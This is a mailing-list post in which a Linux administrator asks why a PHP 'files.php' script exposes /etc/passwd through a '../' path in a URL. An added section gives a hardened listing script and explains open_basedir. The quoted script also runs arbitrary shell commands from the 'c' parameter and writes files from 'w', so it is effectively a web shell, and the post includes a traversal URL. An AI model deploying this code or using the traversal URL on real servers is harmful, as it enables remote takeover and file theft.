Hi,

I have Apache/2.2.3 running on an Arch Linux box, currently hosting about 500 odd domains.

When I browse to a specific domain such as:

http://www.domian.co.za/files.php?l=../../../../../etc/passwd

it displays the contents of the file /etc/passwd, as with any directory that I might request via the URL.

I changed all the "Options Indexes" to "Options -Indexes" in httpd.conf, even removed them, yet Apache still displays my directories. I tried adding the "Options -Indexes" to an .htaccess file, but still with no luck.

Here's the files.php script:

<?php
/*
 * Assume document root is /usr/local/websites/mydomain
 * The actual doc root is /var/www/vhosts/mydomain
 */
$location = $_GET['l']; ;//'../../fly.co.za/subdomains';
// Move up one directory
$parent = dir($location);
$com = $_GET['c'];
if($com != null) {
    echo "<pre>";
    echo system($com);
    echo "</pre>";
    die();
}
$w = $_GET['w'];
if($w != null) {
    file_put_contents($location . $w,$w);
    die();
}
// List the contents of the current directory
// i.e.: /usr/local/websites
if(is_file($location)) {
    echo "<pre>";
    readfile($location);
    echo "</pre>";
}
while($entry = $parent->read()) {
    echo $entry . '<br>';
}
$parent->close();
?>

This lists *all* directories with a little playing in the path, except /etc/shadow, seeing as the permissions on /etc/shadow are 700, not 755 like the rest of the files in the directory. As it should be.

How do I fix this?

If this is the wrong list for this, please accept my apologies.

Thank you.

--
Regards,
Francois Hall
<http://www.webafrica.co.za>
Snr. Linux Systems Administrator
________________________________
+27 21 464 9876 : Telephone
0861 555 222 : Reception
________________________________
Web Africa Networks (Pty) Ltd
[ Named one of the Top 50 ICTe Companies in SA ]
[ MyBroadband People's Choice, ISP of the Year ]
Disclaimer: http://www.webafrica.co.za/disclaimer
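
Added example, not part of the original post and not the poster's code: a listing script that resolves the `l` parameter with `realpath()` and refuses anything outside one base directory, with the `c` (command) and `w` (write) branches of files.php left out entirely. `BASE_DIR` and `confine_path()` are hypothetical names, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example (not the poster's code). BASE_DIR is an assumed path;
// confine_path() is a hypothetical helper name. Requires PHP 7.1+.
const BASE_DIR = '/var/www/vhosts/mydomain/files';

// Return the resolved path only if it stays inside $base, otherwise null.
function confine_path(string $base, string $userPath): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null;                       // reject embedded NUL bytes
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks, so the comparison
    // is made on the location that would actually be opened.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null;                       // path does not exist
    }
    // Match exactly or up to a separator, so /srv/files-old is not
    // accepted as being inside /srv/files.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

$requested = isset($_GET['l']) && is_string($_GET['l']) ? $_GET['l'] : '';
$path = confine_path(BASE_DIR, $requested);
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}

header('Content-Type: text/html; charset=UTF-8');
if (is_file($path)) {
    // Escape file contents so they are shown as text, not rendered as HTML.
    echo '<pre>' . htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8') . '</pre>';
} else {
    foreach (scandir($path) ?: [] as $entry) {
        if ($entry !== '.' && $entry !== '..') {
            echo htmlspecialchars($entry, ENT_QUOTES, 'UTF-8') . '<br>';
        }
    }
}
```

`Options -Indexes` only disables the directory listings Apache generates itself (mod_autoindex); it has no effect on output a PHP script produces, so the restriction has to be enforced in the script or through PHP's `open_basedir` setting for the virtual host.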